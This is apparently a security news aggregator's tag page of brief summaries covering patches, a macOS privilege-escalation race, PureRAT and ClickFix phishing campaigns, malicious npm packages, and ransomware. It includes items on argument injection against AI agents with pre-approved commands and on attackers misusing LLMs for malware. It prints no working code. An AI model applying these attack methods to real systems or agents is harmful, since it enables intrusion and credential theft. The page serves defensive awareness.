Ivanti and Zoom have released security patches to address multiple critical vulnerabilities in their products, including issues that could allow remote code execution, privilege escalation, and information disclosure. Users are urged to update their systems promptly to prevent potential exploitation. #IvantiEMP #ZoomVulnerabilities…
Tag: MACOS
.png "CrashOne – A Starbucks Story – CVE-2025-24277")
A race in osanalyticshelperd’s crash-report creation allowed an attacker to combine sandbox-extension abuse, XPC message manipulation, and a non-atomic rename to place files (including a sudoers entry) as root on macOS, enabling local privilege escalation (CVE-2025-24277) and potential sandbox escape. The issue was fixed by restricting the XPC call with the entitlement com.apple.private.osanalytics.write-logs.allow. #osanalyticshelperd #CVE-2025-24277
A widespread phishing campaign targeting the hospitality industry uses spear-phishing emails impersonating Booking.com to infect hotel systems with PureRAT malware, stealing credentials and personal data. The campaign has been active since April 2025, employing sophisticated social engineering tactics and marketplaces for stolen Booking.com logs. #PureRAT #Booking.com #Expedia #LolzTeam…
Two AI agents with pre-approved commands can still be exploited via argument injection, enabling remote code execution (RCE) despite human approval. The post outlines antipatterns, real-world attack examples across three platforms, and practical defenses like sandboxing and argument separation.
#argumentinjection #RCE #sandboxing #GTFOBINS #LOLBINS…
A security flaw in Samsung Galaxy devices was exploited as a zero-day to deliver the espionage tool LANDFALL, targeting Middle Eastern users. The campaign involved malicious WhatsApp images and exploited two unpatched vulnerabilities, revealing advanced command-and-control techniques. #CVE-2025-21042 #LANDFALL #StealthFalcon…
A phishing campaign called “I Paid Twice” targeted hotel establishments by using compromised Booking.com accounts and ClickFix social engineering to deliver PowerShell commands that deploy PureRAT, enabling theft of booking-extranet credentials and subsequent customer-targeted banking phishing. The operation leveraged a redirection/TDS infrastructure, hundreds of malicious domains, and a cybercrime ecosystem selling Booking.com logs and services such as traffers and log checkers. #PureRAT #ClickFix
ClickFix attacks have become more sophisticated by incorporating videos, timers, and OS detection to deceive victims into executing malicious commands. These tactics aim to steal information by tricking users into pasting harmful code, often through fake CAPTCHA verifications. #ClickFix #CloudflareCaptcha #Malvertising
Google has released an emergency update for Chrome 142 to fix critical remote code execution vulnerabilities, including a high-severity flaw in WebGPU. The update is being rolled out gradually across desktop and Android devices to enhance security and prevent potential exploits. #WebGPU #CVE-2025-12725…
Google Threat Intelligence Group (GTIG) reports that adversaries have progressed from using AI for productivity to deploying novel AI-enabled malware that dynamically alters behavior during execution, exemplified by families like PROMPTFLUX and PROMPTSTEAL. The report documents state-backed and criminal actors misusing Gemini and other LLMs across the attack lifecycle and details mitigations Google has taken, including disabling assets and strengthening model and classifier safeguards. #PROMPTFLUX #PROMPTSTEAL
Socket’s Threat Research Team discovered 10 typosquatted npm packages that execute a multi-stage credential stealer via npm’s postinstall hook, using four layers of JavaScript obfuscation, a fake CAPTCHA prompt, IP fingerprinting, and a downloaded 24MB PyInstaller data_extracter binary to harvest credentials across Windows, Linux, and macOS. The campaign’s packages (published July 4, 2025) accumulated over 9,900 downloads, contact the npm registry was made for takedown, and the actor registered packages under the alias andrew_r1 (parvlhonor@gmx[.]com). #data_extracter #andrew_r1
A critical security flaw in the “@react-native-community/cli” npm package has been patched, which allowed remote attackers to execute arbitrary OS commands. The vulnerability, CVE-2025-11953, posed a significant risk due to its ease of exploitation and broad attack surface. #ReactNative #CVE202511953…
A critical vulnerability (CVE-2025-11953) has been discovered in the React Native Community CLI NPM package, which could allow threat actors to execute arbitrary commands on affected systems. The issue has been promptly patched by Meta, urging developers to update to version 20.0.0 to mitigate risks. #CVE202511953 #ReactNative…
Google’s AI agent Big Sleep uncovered multiple vulnerabilities in Apple’s WebKit, leading to potential crashes and memory corruption in Safari. Apple addressed these issues in the latest updates across various devices and operating systems, highlighting ongoing AI-driven security advancements. #BigSleep #WebKitVulnerabilities…
Apple has released significant security updates for iOS, iPadOS, and macOS to fix over 100 vulnerabilities, including critical WebKit flaws. These patches address issues that could lead to data leaks, system crashes, and privilege escalation, enhancing device security. #WebKit #KernelMemoryCorruption…
The Akira ransomware gang claims to have stolen 23 GB of sensitive data from Apache OpenOffice, raising concerns about security in open-source projects. The incident highlights the increasing threat of ransomware targeting nonprofit organizations and software foundations. #Akira #ApacheOpenOffice…